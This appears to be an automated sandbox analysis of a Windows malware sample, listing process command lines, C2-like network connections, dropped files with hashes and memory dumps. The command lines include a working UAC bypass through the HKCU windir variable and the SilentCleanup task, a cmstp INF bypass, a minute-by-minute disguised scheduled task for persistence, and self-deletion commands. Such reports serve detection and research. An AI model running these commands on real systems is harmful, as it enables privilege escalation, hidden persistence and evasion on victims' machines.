"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe

"C:\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe"

C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe

"C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe"

C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe

"C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe"

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

"C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe"

C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe

"C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Windows\SysWOW64\logagent.exe

C:\Windows\System32\logagent.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Public\Trast.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Windows\SysWOW64\reg.exe

reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "

C:\Windows\SysWOW64\schtasks.exe

schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe

"C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Public\nest.bat" "

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

"{path}"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFF26.tmp"

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

"{path}"

\??\c:\windows\SysWOW64\cmstp.exe

"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\eiyxrtf0.inf

C:\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe

"{path}"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /pid 1088 & erase C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\865607833000956\\* & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /pid 1088

C:\Windows\system32\taskeng.exe

taskeng.exe {3F00FE28-2921-4FE6-B46F-53914580BBC3} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 telete.in udp
N/A 195.201.225.248:443 telete.in tcp
N/A 45.67.231.40:80 45.67.231.40 tcp
N/A 8.8.8.8:53 danielmi.ac.ug udp
N/A 185.215.113.77:80 danielmi.ac.ug tcp
N/A 185.215.113.77:80 danielmi.ac.ug tcp
N/A 8.8.8.8:53 cdn.discordapp.com udp
N/A 162.159.134.233:443 cdn.discordapp.com tcp
N/A 162.159.134.233:443 cdn.discordapp.com tcp
N/A 162.159.134.233:443 cdn.discordapp.com tcp
N/A 8.8.8.8:53 sergio.ac.ug udp
N/A 162.159.134.233:443 cdn.discordapp.com tcp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 8.8.8.8:53 danielmax.ac.ug udp
N/A 185.215.113.77:80 danielmax.ac.ug tcp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 icacxndo.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 icando.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 162.159.134.233:443 cdn.discordapp.com tcp
N/A 8.8.8.8:53 www.microsoft.com udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp

Files

memory/1028-62-0x0000000075591000-0x0000000075593000-memory.dmp

\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/1736-65-0x0000000000000000-mapping.dmp

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/1704-75-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1736-76-0x0000000000350000-0x0000000000358000-memory.dmp

memory/1736-74-0x0000000000240000-0x0000000000241000-memory.dmp

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/1028-72-0x00000000001D0000-0x00000000001D1000-memory.dmp

memory/1704-71-0x000000000041A684-mapping.dmp

\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/1628-80-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/1532-82-0x000000000044003F-mapping.dmp

memory/1704-85-0x00000000002B0000-0x00000000002B1000-memory.dmp

memory/1532-86-0x0000000000400000-0x0000000000495000-memory.dmp

memory/1532-87-0x0000000000230000-0x0000000000231000-memory.dmp

\Users\Admin\AppData\LocalLow\sqlite3.dll

MD5 f964811b68f9f1487c2b41e1aef576ce
SHA1 b423959793f14b1416bc3b7051bed58a1034025f
SHA256 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll

MD5 02cc7b8ee30056d5912de54f1bdfc219
SHA1 a6923da95705fb81e368ae48f93d28522ef552fb
SHA256 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA512 0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll

MD5 eae9273f8cdcf9321c6c37c244773139
SHA1 8378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256 a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA512 06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\vcruntime140.dll

MD5 7587bf9cb4147022cd5681b015183046
SHA1 f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256 c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA512 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\msvcp140.dll

MD5 109f0f02fd37c84bfc7508d4227d7ed5
SHA1 ef7420141bb15ac334d3964082361a460bfdb975
SHA256 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA512 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll

MD5 4e8df049f3459fa94ab6ad387f3561ac
SHA1 06ed392bc29ad9d5fc05ee254c2625fd65925114
SHA256 25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA512 3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll

MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll

MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

memory/1720-97-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

C:\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

C:\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/1720-100-0x00000000002F0000-0x00000000002F1000-memory.dmp

memory/1720-102-0x00000000020D0000-0x0000000002136000-memory.dmp

memory/1720-103-0x00000000049B0000-0x00000000049B1000-memory.dmp

memory/1720-104-0x00000000004B0000-0x00000000004B2000-memory.dmp

\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

memory/1716-107-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

memory/1716-109-0x0000000000220000-0x0000000000221000-memory.dmp

\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/1308-111-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/1308-114-0x0000000001280000-0x0000000001281000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/1308-116-0x0000000000B80000-0x0000000000BE0000-memory.dmp

memory/1308-117-0x0000000001210000-0x0000000001211000-memory.dmp

\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/1712-120-0x0000000000000000-mapping.dmp

memory/1712-123-0x00000000003A0000-0x00000000003A1000-memory.dmp

memory/1712-125-0x00000000006E0000-0x0000000000740000-memory.dmp

memory/1712-126-0x00000000049C0000-0x00000000049C1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/760-132-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/1780-134-0x0000000000000000-mapping.dmp

memory/1728-135-0x0000000000000000-mapping.dmp

memory/760-136-0x0000000000220000-0x0000000000221000-memory.dmp

memory/1232-137-0x0000000000000000-mapping.dmp

memory/1600-138-0x0000000000000000-mapping.dmp

memory/1232-139-0x0000000000100000-0x0000000000101000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/1232-142-0x0000000000080000-0x0000000000081000-memory.dmp

memory/1232-144-0x0000000000260000-0x0000000000261000-memory.dmp

memory/1232-145-0x0000000010580000-0x00000000105F3000-memory.dmp

C:\Users\Public\Trast.bat

MD5 4068c9f69fcd8a171c67f81d4a952a54
SHA1 4d2536a8c28cdcc17465e20d6693fb9e8e713b36
SHA256 24222300c78180b50ed1f8361ba63cb27316ec994c1c9079708a51b4a1a9d810
SHA512 a64f9319acc51fffd0491c74dcd9c9084c2783b82f95727e4bfe387a8528c6dcf68f11418e88f1e133d115daf907549c86dd7ad866b2a7938add5225fbb2811d

memory/1492-147-0x0000000000000000-mapping.dmp

C:\Users\Public\UKO.bat

MD5 eaf8d967454c3bbddbf2e05a421411f8
SHA1 6170880409b24de75c2dc3d56a506fbff7f6622c
SHA256 f35f2658455a2e40f151549a7d6465a836c33fa9109e67623916f889849eac56
SHA512 fe5be5c673e99f70c93019d01abb0a29dd2ecf25b2d895190ff551f020c28e7d8f99f65007f440f0f76c5bcac343b2a179a94d190c938ea3b9e1197890a412e9

memory/2024-149-0x0000000000000000-mapping.dmp

memory/1344-150-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3a1ed9c3a15d01d06774e635b80f737b
SHA1 7860c6f384029586c3a2d8145bf140c6f09f965f
SHA256 895e6ca799bcb258432e9fb1334a4a2ca5f1d3d4c12b08dda129c87d367fed3f
SHA512 6bd71f1cd8878769689f262b2f59e9ce867228a90a56651afe974cd78c77dee55d8536c7d9a06b510f9877d8ba57a10a761c996556ec95b33ac5d30218b33a70

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 3eff1d28a83d7c01ebbd6fdbeeb51b9b
SHA1 4f34a875b74b9b002ab25fb2a95a18ce94fbb783
SHA256 668692f2c0638542a373e6622e97ab2e356a18d3b500a2bc82da133de1b7ac43
SHA512 1c64b1895f0d8aaec135e36f99ff95c63193230dd2a361513c6b1a9964630455ebe6c7504e8eb172f83784d6617b5bd5b06ea9d3f898ec2684b996c167710505

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 3bb37c22086514b2d7e4bd549e818687
SHA1 f68d17c86e433744bb6361f8aae591a08458e42f
SHA256 c2c0a13b83269da2bdcf59a48db6d5c27ccccd43940b4169f21a40287a415277
SHA512 eeeade50eac37d0a3f20a831dec15e101c13b19ed24c09937625aca2dcffa6a521bcfb1918423454d870e4f9ebff0645cbabbd23ef5bdf92c1421224d2a22462

memory/1384-154-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/1764-156-0x0000000000400000-0x0000000000405000-memory.dmp

memory/1232-157-0x0000000000400000-0x0000000000470000-memory.dmp

memory/1720-158-0x0000000004E30000-0x0000000004EA7000-memory.dmp

memory/1764-159-0x0000000000400000-0x0000000000405000-memory.dmp

memory/1308-160-0x00000000010B0000-0x0000000001122000-memory.dmp

memory/980-161-0x0000000000000000-mapping.dmp

memory/1764-162-0x0000000000400000-0x0000000000405000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/1308-166-0x0000000000A80000-0x0000000000AA0000-memory.dmp

memory/1764-169-0x0000000000400000-0x0000000000405000-memory.dmp

memory/1720-165-0x0000000000750000-0x0000000000776000-memory.dmp

C:\Users\Public\nest.bat

MD5 8ada51400b7915de2124baaf75e3414c
SHA1 1a7b9db12184ab7fd7fce1c383f9670a00adb081
SHA256 45aa3957c29865260a78f03eef18ae9aebdbf7bea751ecc88be4a799f2bb46c7
SHA512 9afc138157a4565294ca49942579cdb6f5d8084e56f9354738de62b585f4c0fa3e7f2cbc9541827f2084e3ff36c46eed29b46f5dd2444062ffcd05c599992e68

memory/1088-178-0x0000000000417A8B-mapping.dmp

\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
